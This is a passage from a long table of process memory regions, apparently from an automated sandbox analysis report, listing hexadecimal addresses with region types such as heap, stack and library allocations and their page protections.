|
heap
|
page read and write
|
||
|
42D9000
|
heap
|
page read and write
|
||
|
33F000
|
heap
|
page read and write
|
||
|
386E000
|
heap
|
page read and write
|
||
|
254000
|
heap
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
7FE89893000
|
trusted library allocation
|
page execute and read and write
|
||
|
B78000
|
unkown
|
page readonly
|
||
|
355000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2EBB000
|
stack
|
page read and write
|
||
|
260000
|
heap
|
page read and write
|
||
|
430A000
|
heap
|
page read and write
|
||
|
2B4000
|
heap
|
page read and write
|
||
|
25BF000
|
stack
|
page read and write
|
||
|
16C000
|
stack
|
page read and write
|
||
|
1A6A0000
|
heap
|
page read and write
|
||
|
1A9FB000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
2982000
|
trusted library allocation
|
page read and write
|
||
|
3F4000
|
heap
|
page read and write
|
||
|
3DD000
|
heap
|
page read and write
|
||
|
2975000
|
trusted library allocation
|
page read and write
|
||
|
43F000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
1C550000
|
heap
|
page read and write
|
||
|
270C000
|
trusted library allocation
|
page read and write
|
||
|
317000
|
heap
|
page read and write
|
||
|
2F40000
|
trusted library allocation
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
42D9000
|
heap
|
page read and write
|
||
|
3EF5000
|
heap
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
37E6000
|
heap
|
page read and write
|
||
|
37F3000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
1F90000
|
direct allocation
|
page read and write
|
||
|
4A0000
|
remote allocation
|
page execute and read and write
|
||
|
1D90000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
5069000
|
trusted library allocation
|
page read and write
|
||
|
248D000
|
trusted library allocation
|
page read and write
|
||
|
3861000
|
heap
|
page read and write
|
||
|
1B29E000
|
direct allocation
|
page read and write
|
||
|
2750000
|
trusted library allocation
|
page read and write
|
||
|
1A936000
|
heap
|
page read and write
|
||
|
37F0000
|
heap
|
page read and write
|
||
|
1FA3000
|
direct allocation
|
page read and write
|
||
|
386E000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
1BA000
|
heap
|
page read and write
|
||
|
430C000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
42D2000
|
heap
|
page read and write
|
||
|
12031000
|
trusted library allocation
|
page read and write
|
||
|
1DC6000
|
heap
|
page read and write
|
||
|
42D9000
|
heap
|
page read and write
|
||
|
1A859000
|
stack
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
3786000
|
heap
|
page read and write
|
||
|
4F0000
|
heap
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
1B33F000
|
stack
|
page read and write
|
||
|
3F21000
|
heap
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
394000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
7FE89956000
|
trusted library allocation
|
page read and write
|
||
|
8F5000
|
heap
|
page read and write
|
||
|
40C1000
|
heap
|
page read and write
|
||
|
397000
|
heap
|
page read and write
|
||
|
42DA000
|
heap
|
page read and write
|
||
|
1E14000
|
heap
|
page read and write
|
||
|
318000
|
heap
|
page read and write
|
||
|
297B000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
312000
|
heap
|
page read and write
|
||
|
1F30000
|
direct allocation
|
page read and write
|
||
|
1B3DC000
|
stack
|
page read and write
|
||
|
3F16000
|
heap
|
page read and write
|
||
|
3F22000
|
heap
|
page read and write
|
||
|
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
|
1F70000
|
direct allocation
|
page read and write
|
||
|
42FF000
|
heap
|
page read and write
|
||
|
3882000
|
heap
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
25F6000
|
heap
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
430C000
|
heap
|
page read and write
|
||
|
40A1000
|
heap
|
page read and write
|
||
|
430A000
|
heap
|
page read and write
|
||
|
388F000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2E91000
|
trusted library allocation
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
27C000
|
heap
|
page read and write
|
||
|
1A62E000
|
stack
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
2363000
|
trusted library allocation
|
page read and write
|
||
|
1F97000
|
direct allocation
|
page read and write
|
||
|
1FA3000
|
direct allocation
|
page read and write
|
||
|
1CED000
|
direct allocation
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
37F0000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
1AC00000
|
heap
|
page read and write
|
||
|
3249000
|
trusted library allocation
|
page read and write
|
||
|
2400000
|
trusted library allocation
|
page read and write
|
||
|
3FA000
|
heap
|
page read and write
|
||
|
3C69000
|
trusted library allocation
|
page read and write
|
||
|
4301000
|
heap
|
page read and write
|
||
|
2973000
|
trusted library allocation
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
430D000
|
heap
|
page read and write
|
||
|
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
3EF5000
|
heap
|
page read and write
|
||
|
1A6B9000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
42C5000
|
heap
|
page read and write
|
||
|
1F5B000
|
stack
|
page read and write
|
||
|
34CF000
|
stack
|
page read and write
|
||
|
2088000
|
trusted library allocation
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
2A95000
|
trusted library allocation
|
page read and write
|
||
|
1AA66000
|
heap
|
page read and write
|
||
|
23C1000
|
trusted library allocation
|
page read and write
|
||
|
2080000
|
heap
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
2D3000
|
heap
|
page read and write
|
||
|
1B4AB000
|
stack
|
page read and write
|
||
|
7869000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
29F000
|
heap
|
page read and write
|
||
|
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
|
376F000
|
stack
|
page read and write
|
||
|
42FF000
|
heap
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
3780000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
280D000
|
trusted library allocation
|
page read and write
|
||
|
6469000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
B72000
|
unkown
|
page execute read
|
||
|
462000
|
heap
|
page read and write
|
||
|
2869000
|
trusted library allocation
|
page read and write
|
||
|
2971000
|
trusted library allocation
|
page read and write
|
||
|
196000
|
heap
|
page read and write
|
||
|
7FE8994C000
|
trusted library allocation
|
page execute and read and write
|
||
|
237E000
|
trusted library allocation
|
page read and write
|
||
|
358000
|
heap
|
page read and write
|
||
|
3F2E000
|
heap
|
page read and write
|
||
|
42D7000
|
heap
|
page read and write
|
||
|
42D9000
|
heap
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
1C58B000
|
heap
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
2728000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
2340000
|
remote allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2085000
|
heap
|
page read and write
|
||
|
2340000
|
remote allocation
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
297E000
|
trusted library allocation
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
3EF5000
|
heap
|
page read and write
|
||
|
1EA4000
|
heap
|
page read and write
|
||
|
1A6FF000
|
stack
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
1AA30000
|
heap
|
page read and write
|
||
|
3786000
|
heap
|
page read and write
|
||
|
1C60000
|
heap
|
page read and write
|
||
|
253000
|
heap
|
page read and write
|
||
|
1C40C000
|
stack
|
page read and write
|
||
|
27BB000
|
trusted library allocation
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
1A9B2000
|
heap
|
page read and write
|
||
|
454000
|
heap
|
page execute and read and write
|
||
|
363000
|
heap
|
page read and write
|
||
|
23D0000
|
heap
|
page execute and read and write
|
||
|
6E69000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
1D90000
|
trusted library allocation
|
page read and write
|
||
|
39E000
|
heap
|
page read and write
|
||
|
3E6E000
|
heap
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
3FB000
|
heap
|
page read and write
|
||
|
1C197000
|
heap
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
39E000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F70000
|
trusted library allocation
|
page read and write
|
||
|
23C8000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1A4A4000
|
heap
|
page execute and read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page execute and read and write
|
||
|
37FD000
|
heap
|
page read and write
|
||
|
4E9000
|
heap
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE899B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
1C190000
|
heap
|
page read and write
|
||
|
2979000
|
trusted library allocation
|
page read and write
|
||
|
42A1000
|
heap
|
page read and write
|
||
|
1B53F000
|
stack
|
page read and write
|
||
|
383C000
|
heap
|
page read and write
|
||
|
1A9EE000
|
heap
|
page read and write
|
||
|
2A9000
|
heap
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
277000
|
heap
|
page read and write
|
||
|
7FE898A3000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
3EFA000
|
heap
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
1A5B0000
|
heap
|
page execute and read and write
|
||
|
3F04000
|
heap
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
452000
|
heap
|
page read and write
|
||
|
498000
|
heap
|
page read and write
|
||
|
278F000
|
stack
|
page read and write
|
||
|
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
|
3D9E000
|
heap
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
7FE898AB000
|
trusted library allocation
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
37F4000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
4301000
|
heap
|
page read and write
|
||
|
42F9000
|
heap
|
page read and write
|
||
|
7FE89946000
|
trusted library allocation
|
page read and write
|
||
|
337000
|
heap
|
page read and write
|
||
|
3269000
|
trusted library allocation
|
page read and write
|
||
|
4EF000
|
trusted library allocation
|
page read and write
|
||
|
339000
|
heap
|
page read and write
|
||
|
1A4A0000
|
heap
|
page execute and read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
1A925000
|
stack
|
page read and write
|
||
|
B70000
|
unkown
|
page readonly
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89892000
|
trusted library allocation
|
page read and write
|
||
|
A069000
|
trusted library allocation
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
231C000
|
stack
|
page read and write
|
||
|
1C74E000
|
stack
|
page read and write
|
||
|
38E000
|
heap
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
25C0000
|
heap
|
page read and write
|
||
|
1AC5C000
|
stack
|
page read and write
|
||
|
388B000
|
heap
|
page read and write
|
||
|
223C000
|
trusted library allocation
|
page read and write
|
||
|
2C6F000
|
stack
|
page read and write
|
||
|
3DE9000
|
heap
|
page read and write
|
||
|
7FE89A43000
|
trusted library allocation
|
page read and write
|
||
|
1BF000
|
heap
|
page read and write
|
||
|
1C45000
|
heap
|
page read and write
|
||
|
1C550000
|
heap
|
page read and write
|
||
|
1FC000
|
stack
|
page read and write
|
||
|
2AAF000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
37F7000
|
heap
|
page read and write
|
||
|
1B07F000
|
stack
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1A5AE000
|
stack
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
427000
|
heap
|
page read and write
|
||
|
403000
|
heap
|
page read and write
|
||
|
7FE89940000
|
trusted library allocation
|
page read and write
|
||
|
314000
|
heap
|
page read and write
|
||
|
1B3B0000
|
heap
|
page read and write
|
||
|
3E4000
|
heap
|
page read and write
|
||
|
1C52F000
|
stack
|
page read and write
|
||
|
397000
|
heap
|
page read and write
|
||
|
38C8000
|
trusted library allocation
|
page read and write
|
||
|
495000
|
heap
|
page read and write
|
||
|
4D6000
|
heap
|
page read and write
|
||
|
1C192000
|
heap
|
page read and write
|
||
|
7FE89A47000
|
trusted library allocation
|
page read and write
|
||
|
3A50000
|
heap
|
page read and write
|
||
|
1C30000
|
trusted library allocation
|
page read and write
|
||
|
1EA0000
|
heap
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
12310000
|
trusted library allocation
|
page read and write
|
||
|
1C90F000
|
stack
|
page read and write
|
||
|
36A000
|
heap
|
page read and write
|
||
|
4EF000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
457000
|
heap
|
page read and write
|
||
|
1ADDE000
|
stack
|
page read and write
|
||
|
91F000
|
heap
|
page read and write
|
||
|
50A000
|
heap
|
page read and write
|
||
|
2031000
|
trusted library allocation
|
page read and write
|
||
|
2312000
|
trusted library allocation
|
page read and write
|
||
|
1A4A8000
|
heap
|
page execute and read and write
|
||
|
386E000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
234C000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
4D5000
|
heap
|
page read and write
|
||
|
1F5000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
1C115000
|
heap
|
page read and write
|
||
|
7FE89894000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
21F000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
386E000
|
heap
|
page read and write
|
||
|
2AA5000
|
trusted library allocation
|
page read and write
|
||
|
27BD000
|
trusted library allocation
|
page read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
1E50000
|
trusted library allocation
|
page execute read
|
||
|
2AE000
|
heap
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
195000
|
stack
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
2804000
|
trusted library allocation
|
page read and write
|
||
|
430C000
|
heap
|
page read and write
|
||
|
380D000
|
heap
|
page read and write
|
||
|
1E84000
|
heap
|
page read and write
|
||
|
1AE0000
|
trusted library allocation
|
page read and write
|
||
|
48D000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
3E6C000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
382000
|
heap
|
page read and write
|
||
|
1C6F0000
|
heap
|
page read and write
|
||
|
2301000
|
trusted library allocation
|
page read and write
|
||
|
385B000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
D5000
|
stack
|
page read and write
|
||
|
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CEB000
|
direct allocation
|
page read and write
|
||
|
3D1000
|
heap
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
4300000
|
heap
|
page read and write
|
||
|
3F2E000
|
heap
|
page read and write
|
||
|
3D37000
|
heap
|
page read and write
|
||
|
42DB000
|
heap
|
page read and write
|
||
|
42F6000
|
heap
|
page read and write
|
||
|
42D9000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
42C9000
|
heap
|
page read and write
|
||
|
4D9000
|
heap
|
page read and write
|
||
|
7FE89A4C000
|
trusted library allocation
|
page read and write
|
||
|
283D000
|
stack
|
page read and write
|
||
|
430A000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
355000
|
heap
|
page read and write
|
||
|
3863000
|
heap
|
page read and write
|
||
|
3CE000
|
heap
|
page read and write
|
||
|
1F10000
|
direct allocation
|
page read and write
|
||
|
31E000
|
heap
|
page read and write
|
||
|
1A5EE000
|
heap
|
page execute and read and write
|
||
|
152000
|
stack
|
page read and write
|
||
|
3D30000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
1E10000
|
heap
|
page read and write
|
||
|
1B36000
|
heap
|
page read and write
|
||
|
143000
|
stack
|
page read and write
|
||
|
44A000
|
heap
|
page read and write
|
||
|
1A22C000
|
stack
|
page read and write
|
||
|
1ABAC000
|
stack
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
3B7A000
|
stack
|
page read and write
|
||
|
4D0000
|
trusted library allocation
|
page read and write
|
||
|
1B630000
|
heap
|
page read and write
|
||
|
1B34F000
|
stack
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
426000
|
heap
|
page read and write
|
||
|
3883000
|
heap
|
page read and write
|
||
|
2DF000
|
heap
|
page read and write
|
||
|
91D000
|
heap
|
page read and write
|
||
|
33AC000
|
stack
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
1A030000
|
heap
|
page read and write
|
||
|
4D6000
|
heap
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
48D000
|
heap
|
page read and write
|
||
|
3F16000
|
heap
|
page read and write
|
||
|
2FE000
|
heap
|
page read and write
|
||
|
39AA000
|
trusted library allocation
|
page read and write
|
||
|
4D7000
|
heap
|
page read and write
|
||
|
1CF0000
|
direct allocation
|
page read and write
|
||
|
1E9000
|
heap
|
page read and write
|
||
|
1B3B4000
|
heap
|
page read and write
|
||
|
39D000
|
heap
|
page read and write
|
||
|
4300000
|
heap
|
page read and write
|
||
|
35DF000
|
stack
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
1A933000
|
heap
|
page read and write
|
||
|
9669000
|
trusted library allocation
|
page read and write
|
||
|
12040000
|
trusted library allocation
|
page read and write
|
||
|
377F000
|
heap
|
page read and write
|
||
|
3DE9000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
447000
|
heap
|
page read and write
|
||
|
3EF9000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
3F20000
|
heap
|
page read and write
|
||
|
387F000
|
heap
|
page read and write
|
||
|
2977000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
3F2000
|
heap
|
page read and write
|
||
|
2912000
|
trusted library allocation
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
7FE89A72000
|
trusted library allocation
|
page read and write
|
||
|
2A8E000
|
stack
|
page read and write
|
||
|
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
398000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
2F9000
|
stack
|
page read and write
|
||
|
2829000
|
trusted library allocation
|
page read and write
|
||
|
2250000
|
heap
|
page read and write
|
||
|
1A80F000
|
stack
|
page read and write
|
||
|
3255000
|
trusted library allocation
|
page read and write
|
||
|
37D4000
|
heap
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
3784000
|
heap
|
page read and write
|
||
|
1B1CF000
|
stack
|
page read and write
|
||
|
1C00000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
2513000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
42A0000
|
heap
|
page read and write
|
||
|
37E000
|
stack
|
page read and write
|
||
|
37FA000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
42D7000
|
heap
|
page read and write
|
||
|
1A695000
|
heap
|
page read and write
|
||
|
2460000
|
heap
|
page read and write
|
||
|
3D6000
|
heap
|
page read and write
|
||
|
2C8000
|
heap
|
page read and write
|
||
|
377C000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
37D4000
|
heap
|
page read and write
|
||
|
12331000
|
trusted library allocation
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
377C000
|
heap
|
page read and write
|
||
|
2451000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A74000
|
trusted library allocation
|
page read and write
|
||
|
37E8000
|
heap
|
page read and write
|
||
|
37D2000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
383000
|
heap
|
page read and write
|
||
|
12061000
|
trusted library allocation
|
page read and write
|
||
|
19B000
|
stack
|
page read and write
|
||
|
288000
|
stack
|
page read and write
|
||
|
1A930000
|
heap
|
page read and write
|
||
|
40E2000
|
heap
|
page read and write
|
||
|
1C49A000
|
stack
|
page read and write
|
||
|
309F000
|
stack
|
page read and write
|
||
|
1B6000
|
heap
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
406000
|
heap
|
page read and write
|
||
|
8269000
|
trusted library allocation
|
page read and write
|
||
|
1CEF000
|
direct allocation
|
page read and write
|
||
|
1C9BF000
|
stack
|
page read and write
|
||
|
1F97000
|
direct allocation
|
page read and write
|
||
|
4669000
|
trusted library allocation
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
1A4DE000
|
heap
|
page execute and read and write
|
||
|
3F11000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
3D34000
|
heap
|
page read and write
|
||
|
3EFB000
|
heap
|
page read and write
|
||
|
8C69000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1EF0000
|
direct allocation
|
page read and write
|
||
|
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
337000
|
heap
|
page read and write
|
||
|
3D38000
|
heap
|
page read and write
|
||
|
1D04000
|
heap
|
page read and write
|
||
|
2519000
|
trusted library allocation
|
page read and write
|
||
|
7FE8989D000
|
trusted library allocation
|
page execute and read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
|
3E9D000
|
heap
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
1D8F000
|
stack
|
page read and write
|
||
|
37F0000
|
heap
|
page read and write
|
||
|
3F22000
|
heap
|
page read and write
|
||
|
24AF000
|
trusted library allocation
|
page read and write
|
||
|
42F9000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
458000
|
heap
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2CA0000
|
trusted library allocation
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
222F000
|
stack
|
page read and write
|
||
|
430A000
|
heap
|
page read and write
|
||
|
2491000
|
trusted library allocation
|
page read and write
|
||
|
31CE000
|
stack
|
page read and write
|
||
|
1C1D5000
|
heap
|
page read and write
|
||
|
42D2000
|
heap
|
page read and write
|
||
|
430B000
|
heap
|
page read and write
|
||
|
2FF000
|
heap
|
page read and write
|
||
|
4CF000
|
heap
|
page read and write
|
||
|
3B80000
|
trusted library allocation
|
page read and write
|
||
|
1D00000
|
heap
|
page read and write
|
||
|
3F11000
|
heap
|
page read and write
|
||
|
466000
|
heap
|
page read and write
|
||
|
499000
|
heap
|
page read and write
|
||
|
1B64C000
|
heap
|
page read and write
|
||
|
264A000
|
stack
|
page read and write
|
||
|
397000
|
heap
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
3B5000
|
heap
|
page read and write
|
||
|
3F21000
|
heap
|
page read and write
|
||
|
1E50000
|
heap
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
281A000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
3A6E000
|
stack
|
page read and write
|
||
|
3F11000
|
heap
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
38E000
|
heap
|
page read and write
|
||
|
8D7000
|
heap
|
page read and write
|
||
|
1C110000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A42000
|
trusted library allocation
|
page read and write
|
||
|
2280000
|
heap
|
page execute and read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
1C36000
|
heap
|
page read and write
|
||
|
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CD0000
|
direct allocation
|
page read and write
|
||
|
1CD7000
|
direct allocation
|
page read and write
|
||
|
4715000
|
heap
|
page read and write
|
||
|
42CC000
|
heap
|
page read and write
|
||
|
5A69000
|
trusted library allocation
|
page read and write
|
||
|
2FC000
|
heap
|
page read and write
|
||
|
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
|
31C000
|
heap
|
page read and write
|
||
|
222E000
|
stack
|
page read and write | page guard
|
||
|
B1E000
|
stack
|
page read and write
|
||
|
4E1000
|
heap
|
page read and write
|
||
|
42CC000
|
heap
|
page read and write
|
||
|
3770000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
3ECD000
|
heap
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
1F8F000
|
stack
|
page read and write
|
||
|
4CB000
|
heap
|
page read and write
|
||
|
3783000
|
heap
|
page read and write
|
||
|
1A971000
|
heap
|
page read and write
|
||
|
3EF9000
|
heap
|
page read and write
|
||
|
2713000
|
trusted library allocation
|
page read and write
|
||
|
1B00000
|
heap
|
page read and write
|
||
|
4D1000
|
heap
|
page read and write
|
||
|
318000
|
heap
|
page read and write
|
||
|
1AFFF000
|
stack
|
page read and write
|
||
|
39E8000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
7FE898B0000
|
trusted library allocation
|
page read and write
|
||
|
42D4000
|
heap
|
page read and write
|
||
|
339000
|
heap
|
page read and write
|
||
|
1EB0000
|
direct allocation
|
page read and write
|
||
|
7FE89976000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
3F21000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
